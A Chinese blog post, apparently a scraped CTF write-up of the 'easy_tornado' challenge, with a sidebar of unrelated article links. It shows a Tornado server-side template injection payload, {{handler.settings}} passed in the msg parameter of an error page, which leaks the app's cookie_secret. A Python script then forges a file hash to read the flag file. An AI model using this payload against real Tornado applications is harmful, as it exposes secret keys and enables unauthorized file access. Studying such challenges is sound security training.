当前位置:网站首页>漏洞复现-easy_tornado
漏洞复现-easy_tornado
2022-07-07 05:07:00 【_s1mple】
[环境]
windows
[工具]
Firefox
[步骤]
tornado是python中的一个web应用框架。
拿到题目发现有三个文件:
flag.txt
/flag.txt
flag in /fllllllllllllag
发现flag在/fllllllllllllag文件里;
welcome.txt
/welcome.txt
render
render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。
测试后发现还有一个error界面,格式为/error?msg=Error,怀疑存在服务端模板注入攻击 (SSTI)
尝试/error?msg={ {datetime}} 在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象,可以参考Tornado官方文档
通过查阅文档发现cookie_secret在Application对象settings属性中,还发现self.application.settings有一个别名
RequestHandler.settings
An alias for self.application.settings.
handler指向的处理当前这个页面的RequestHandler对象, RequestHandler.settings指向self.application.settings, 因此handler.settings指向RequestHandler.application.settings。
构造payload获取cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
计算filehash值:
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()
payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
成功获取flag。
边栏推荐
- Custom class loader loads network class
- 芯片 設計資料下載
- 2022 welder (elementary) judgment questions and online simulation examination
- Network learning (III) -- highly concurrent socket programming (epoll)
- Ansible
- 2022 tea master (intermediate) examination questions and mock examination
- 让Livelink初始Pose与动捕演员一致
- CDC (change data capture technology), a powerful tool for real-time database synchronization
- JS quick start (I)
- Use of JMeter
猜你喜欢
jeeSite 表单页面的Excel 导入功能
Linux server development, redis protocol and asynchronous mode
【踩坑系列】uniapp之h5 跨域的问题
Unityhub cracking & unity cracking
Linux server development, MySQL index principle and optimization
buureservewp(2)
Excel import function of jeesite form page
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
青龙面板-今日头条
【数字IC验证快速入门】11、Verilog TestBench(VTB)入门
随机推荐
Notes on PHP penetration test topics
Summary of redis functions
QT learning 26 integrated example of layout management
【数字IC验证快速入门】14、SystemVerilog学习之基本语法1(数组、队列、结构体、枚举、字符串...内含实践练习)
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after conne
Few shot Learning & meta learning: small sample learning principle and Siamese network structure (I)
微信小程序基本组件使用介绍
C语言二叉树与建堆
Relevant data of current limiting
Hisense TV starts the developer mode
[untitled]
The charm of SQL optimization! From 30248s to 0.001s
芯片 设计资料下载
Pytorch(六) —— 模型调优tricks
Register of assembly language by Wang Shuang
面试题(CAS)
Record a stroke skin bone error of the skirt
Téléchargement des données de conception des puces
【數字IC驗證快速入門】15、SystemVerilog學習之基本語法2(操作符、類型轉換、循環、Task/Function...內含實踐練習)
让Livelink初始Pose与动捕演员一致